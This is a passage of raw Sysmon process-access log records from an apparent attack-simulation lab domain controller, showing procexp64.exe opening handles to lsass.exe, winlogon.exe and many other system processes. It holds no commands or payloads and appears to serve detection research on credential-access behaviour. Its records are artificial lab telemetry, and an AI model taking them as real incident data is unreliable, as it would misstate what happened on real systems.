ndows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789101Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789100Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789099Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789098Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789097Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789096Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789095Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789094Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789093Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789092Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789091Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789090Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789089Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789088Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789087Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789086Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789085Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789084Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789083Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789082Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789081Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789080Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789079Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789078Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789077Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789076Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789075Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789074Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789073Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789306Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789305Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789304Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789303Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789302Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:32.158{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789301Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 